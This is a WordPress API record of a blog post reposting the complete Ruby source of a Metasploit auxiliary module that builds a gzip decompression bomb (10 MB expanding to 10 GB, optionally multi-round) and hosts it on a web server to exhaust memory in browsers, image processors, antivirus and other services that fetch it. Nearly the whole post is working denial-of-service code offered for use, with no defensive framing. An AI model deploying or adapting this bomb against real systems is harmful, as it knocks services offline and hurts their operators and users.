{"id":59280,"date":"2024-08-31T21:20:01","date_gmt":"2024-08-31T18:20:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180515\/gzip_bomb_dos.rb.txt"},"modified":"2024-08-31T21:20:01","modified_gmt":"2024-08-31T18:20:01","slug":"gzip-memory-bomb-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/gzip-memory-bomb-denial-of-service\/","title":{"rendered":"Gzip Memory Bomb Denial Of Service"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

require ‘zlib’
require ‘stringio’<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Gzip Memory Bomb Denial Of Service’,
‘Description’ => %q{
This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.
Many applications will not implement a length limit check and will eat up all memory and
eventually die. This can also be used to kill systems that download\/parse content from
a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).<\/p>\n

A FILEPATH datastore option can also be provided to save the .gz bomb locally.<\/p>\n

Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly
deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)
will generate a 300 byte gzipped file that expands to 10GB.
},
‘Author’ =>
[
‘info[at]aerasec.de’, # 2004 gzip bomb advisory
‘joev’ # Metasploit module
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘URL’, ‘http:\/\/www.aerasec.de\/security\/advisories\/decompression-bomb-vulnerability.html’ ]],
‘DisclosureDate’ => ‘2004-01-01’,
‘Actions’ =>
[
[ ‘WebServer’, ‘Description’ => ‘Host file via web server’ ]],
‘PassiveActions’ =>
[
‘WebServer’
],
‘DefaultAction’ => ‘WebServer’))<\/p>\n

register_options(
[
OptInt.new(‘SIZE’, [true, ‘Size of uncompressed data in megabytes (10GB default).’, 10240]),
OptInt.new(‘ROUNDS’, [true, ‘Rounds of gzip compression. Some applications (FF) support > 1.’, 1]),
OptString.new(‘URIPATH’, [false, ‘Path of URI on server to the gzip bomb (default is random)’]),
OptString.new(‘CONTENT_TYPE’, [false, ‘Content-Type header to serve in the response’, ‘text\/html’])
],
self.class)
end<\/p>\n

def run
datastore[‘HTTP::compression’] = false # not a good idea
@gzip = generate_gzip
print_status “Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes.”
exploit # start http server
end<\/p>\n

def on_request_uri(cli, request)
print_status “Sending gzipped payload to client #{cli.peerhost}”
rounds = ([‘gzip’]*datastore[‘ROUNDS’]).join(‘, ‘)
send_response(cli, @gzip, { ‘Content-Encoding’ => rounds, ‘Content-Type’ => datastore[‘CONTENT_TYPE’] })
end<\/p>\n

# zlib ftw
def generate_gzip(size=default_size, blocks=nil, reps=nil)
reps ||= datastore[‘ROUNDS’]return blocks if reps < 1<\/p>\n

print_status “Generating gzip bomb…”
StringIO.open do |io|
stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)
buf = nil
begin
# add MB of data to the stream. this takes a little while, but doesn’t kill memory.
if blocks.nil?
chunklen = 1024*1024*8 # 8mb per chunk
a = “A”*chunklen
n = size \/ chunklen<\/p>\n

n.times do |i|
stream << a
if i % 100 == 0
print_status “#{i.to_s.rjust(Math.log(n,10).ceil)}\/#{n} chunks added (#{‘%.1f’ % (i.to_f\/n.to_f*100)}%)”
end
end
else
stream << blocks
end<\/p>\n

a = nil # gc a
buf = generate_gzip(size, io.string, reps-1)
ensure
stream.flush
stream.close
end
buf
end
end<\/p>\n

def default_size
datastore[‘SIZE’]*1024*1024 # mb -> bytes
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘zlib’require ‘stringio’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {})super(update_info(info,‘Name’ => ‘Gzip Memory Bomb Denial Of Service’,‘Description’ => %q{This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.Many applications will not implement a length limit check and will eat up …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59280","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59280"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59280\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}